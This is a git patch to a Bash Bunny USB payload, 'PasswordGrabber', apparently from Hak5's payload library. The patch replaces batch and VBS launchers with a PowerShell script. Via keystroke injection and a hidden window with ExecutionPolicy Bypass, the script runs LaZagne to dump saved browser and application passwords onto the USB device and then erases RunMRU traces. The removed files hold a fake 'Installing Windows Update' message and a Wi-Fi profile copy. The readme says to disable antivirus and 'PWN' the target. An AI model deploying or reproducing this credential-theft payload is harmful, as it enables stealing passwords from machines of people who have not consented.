From 940dc0904369f271a587a31bee2b9221ba28118a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jonathan=20Deb=C3=A9taz?= Date: Mon, 15 Jan 2018 06:36:49 +0100 Subject: [PATCH] Payload updates (#309) --- .../library/credentials/PasswordGrabber/d.cmd | 4 -- .../library/credentials/PasswordGrabber/e.cmd | 24 --------- .../library/credentials/PasswordGrabber/i.vbs | 1 - .../credentials/PasswordGrabber/payload.ps1 | 5 ++ .../credentials/PasswordGrabber/payload.txt | 38 +++++++++----- .../credentials/PasswordGrabber/readme.md | 49 +++++++++---------- 6 files changed, 53 insertions(+), 68 deletions(-) delete mode 100644 payloads/library/credentials/PasswordGrabber/d.cmd delete mode 100644 payloads/library/credentials/PasswordGrabber/e.cmd delete mode 100644 payloads/library/credentials/PasswordGrabber/i.vbs create mode 100644 payloads/library/credentials/PasswordGrabber/payload.ps1 diff --git a/payloads/library/credentials/PasswordGrabber/d.cmd b/payloads/library/credentials/PasswordGrabber/d.cmd deleted file mode 100644 index 604ef639..00000000 --- a/payloads/library/credentials/PasswordGrabber/d.cmd +++ /dev/null @@ -1,4 +0,0 @@ -@echo off -start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" -cscript %~dp0\i.vbs %~dp0\e.cmd -@exit \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd deleted file mode 100644 index 27792067..00000000 --- a/payloads/library/credentials/PasswordGrabber/e.cmd +++ /dev/null @@ -1,24 +0,0 @@ -@echo off -@echo Installing Windows Update - -setlocal -cd /d %~dp0 - -REM Time and Date -set drec=%COMPUTERNAME%_%date%_%TIME: =0% -set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec% -mkdir %dst% >>nul - -REM This executes LaZagne in the current directory and outputs the password file to Loot -%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt" - - -if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* ( -xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul -) - -REM Blink CAPSLOCK key -start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" - -@cls -@exit diff --git a/payloads/library/credentials/PasswordGrabber/i.vbs b/payloads/library/credentials/PasswordGrabber/i.vbs deleted file mode 100644 index 1ffd3c3e..00000000 --- a/payloads/library/credentials/PasswordGrabber/i.vbs +++ /dev/null @@ -1 +0,0 @@ -CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False diff --git a/payloads/library/credentials/PasswordGrabber/payload.ps1 b/payloads/library/credentials/PasswordGrabber/payload.ps1 new file mode 100644 index 00000000..885f9caf --- /dev/null +++ b/payloads/library/credentials/PasswordGrabber/payload.ps1 @@ -0,0 +1,5 @@ +$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber') +$filter = 'password_'+ $env:COMPUTERNAME +$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) +Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') +Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 797dab41..560c3ae4 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt @@ -1,19 +1,33 @@ #!/bin/bash # # Title: Password Grabber -# Author: Razerblade -# Version: 1.2 -# Target: Windows -# Props: Hak5Darren, TeCHemically, dragmus31 +# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... +# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. +# This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. +# Author: jdebetaz +# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade +# Version: 1.1 # Category: Credentials -# -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn executes e.cmd invisibly using i.vbs -# which in turn steals credentials by using LaZagne and saves them to /Loot -# +# Target: Windows +# Attackmodes: HID, STORAGE + +# Options +LOOTDIR=/root/udisk/loot/PasswordGrabber + +######## INITIALIZATION ######## LED SETUP GET SWITCH_POSITION -LED ATTACK ATTACKMODE HID STORAGE -RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" -LED FINISH + +######## MAKE LOOT DIRECTORY ######## +# Setup named logs in loot directory +mkdir -p $LOOTDIR + +######## ATTACK ######## +LED ATTACK +RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')" +# Wait until passwords are grabbed. +sleep 10 + +######## FINISH ######## +LED FINISH \ No newline at end of file diff --git a/payloads/library/credentials/PasswordGrabber/readme.md b/payloads/library/credentials/PasswordGrabber/readme.md index 18129740..31fe7418 100644 --- a/payloads/library/credentials/PasswordGrabber/readme.md +++ b/payloads/library/credentials/PasswordGrabber/readme.md @@ -1,40 +1,35 @@ # PasswordGrabber -* Author: RazerBlade -* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31 -* Version: Version 1.2 -* Firmware support: 1.1+ -* Target: Windows 7+ +* Author: [jdebetaz](https://github.com/jdebetaz) +* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade +* Version: 1.3 +* Frimware support: 1.1 and higher +* Target version: Windows 7 and higher ## Description +Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. -Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... -This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. -This payload makes use of AleZssandroZ awsome LaZagne password recovery tool. - -Full read here: https://github.com/AlessandroZ/LaZagne -Downloads here: https://github.com/AlessandroZ/LaZagne/releases - +Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne) ## Configuration -1. You need to download the latest file from LaZagnes release page. -2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe -3. Plug it in a computer and PWN them. +1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). +2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe +3. Plug your BashBunny and Enjoy -Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. +Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file. -## INFO -By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. +## Info +jdebetaz: I remake this playload with the Payload Best Practice / Style Guide -## DISCLAIMER -Hak5 is not responsible for the execution of 3rd party binaries. -## STATUS +RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder. -| LED | Status | -| ------------------ | -------------------------------------------- | -| Red | Attack Setup | -| Green | Attack Complete | +## Disclaimer +__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__ -## Discussion -[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/ +## Led status +| LED | Status | +|-----------------------------------------------|--------| +| Magenta solid | Setup | +| Yellow single blink | Attack | +| Green 1000ms VERYFAST blink followed by SOLID | Finish |